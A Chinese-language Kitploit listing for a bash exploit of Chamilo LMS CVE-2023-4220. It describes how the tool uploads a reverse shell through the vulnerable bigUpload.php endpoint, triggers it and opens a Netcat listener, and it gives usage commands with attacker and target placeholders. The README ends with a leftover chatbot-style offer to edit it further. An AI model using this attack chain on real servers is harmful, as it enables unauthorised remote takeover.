Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Chamilo-LMS-CVE-2023-4220-Exploit — 翻新版的 Chamilo LMS CVE-2023-4220 漏洞利用,用 bash 编写。 | Kitploit
工具/GitHubGitHub/0xdtc/chamilo-lms-cve-2023-4220-exploit
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHub0xdtc/chamilo-lms-cve-2023-4220-exploit

Chamilo-LMS-CVE-2023-4220-Exploit

翻新版的 Chamilo LMS CVE-2023-4220 漏洞利用,用 bash 编写。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
1年前尚未审核

Chamilo LMS CVE-2023-4220 漏洞利用

概述

该脚本利用了 Chamilo LMS 版本 ≤ v1.11.24 中的一个远程代码执行(RCE)漏洞。该漏洞(CVE-2023-4220)源于 Chamilo LMS 的 bigUpload.php 功能中存在的无限制文件上传漏洞,允许攻击者上传任意文件(如 Web Shell)并执行,从而导致服务器完全被远程代码执行。

该脚本由 Divine Clown 进行了增强,以简化利用过程,自动生成反向 Shell 文件,上传到目标,并启动监听器,使攻击者能够直接访问 Shell。


CVE 详情

  • CVE ID:CVE-2023-4220
  • 受影响软件:Chamilo LMS ≤ v1.11.24
  • 漏洞类型:远程代码执行(RCE)
  • 攻击向量:/main/inc/lib/javascript/bigupload/inc/bigUpload.php 中的无限制文件上传

功能特点

  • 根据攻击者的 IP 和端口,自动从 revshells.com 下载反向 Shell。
  • 使用存在漏洞的 bigUpload.php 端点上传反向 Shell。
  • 静默触发 Shell 并打开 Netcat 监听器以直接访问。

Divine Clown 的增强:

  • 所有中间步骤(下载 Shell、上传等)均被隐藏,仅显示最终的反向 Shell,以简化使用。

使用方法

root@kitploit:~
./CVE-2023-4220.sh -i <attacker_ip> -p <port> -h <host_link>

参数:

  • -i <attacker_ip>:攻击者的 IP 地址,用于反向 Shell。
  • -p <port>:启动 Netcat 监听器的端口。
  • -h <host_link>:存在漏洞的 Chamilo LMS 实例的完整 URL。

示例:

root@kitploit:~
./CVE-2023-4220.sh -i 10.10.14.15 -p 9001 -h http://target-site.com

前提条件

  • 在您的机器上安装 Netcat。
  • 确保目标 Chamilo LMS 版本存在漏洞(≤ v1.11.24)。
  • 拥有执行渗透测试或利用的适当权限。

技术分解

  1. 脚本从 revshells.com 下载反向 Shell,并根据攻击者的 IP 和端口动态生成。
  2. 将反向 Shell 上传到存在漏洞的 bigUpload.php 端点。
  3. 通过访问服务器上的文件 URL 来执行上传的文件。
  4. 启动 Netcat 监听器,一旦文件被触发,建立反向 Shell 连接,使攻击者获得命令行访问权限。

法律免责声明

本工具仅用于教育目的和测试环境,且您必须在获得明确许可的情况下才能利用漏洞。未经授权访问系统是违法的,可能导致刑事指控。作者不对因使用本脚本而产生的任何滥用或损害负责。


致谢

  • 原始漏洞利用作者:Ziad Sakr @Ziad-Sakr
  • 增强与改进:ME(Divine Clown)

如果您想包含任何附加信息或格式,请随时进一步修改此 README!如果您需要其他帮助,请告诉我。

下载工具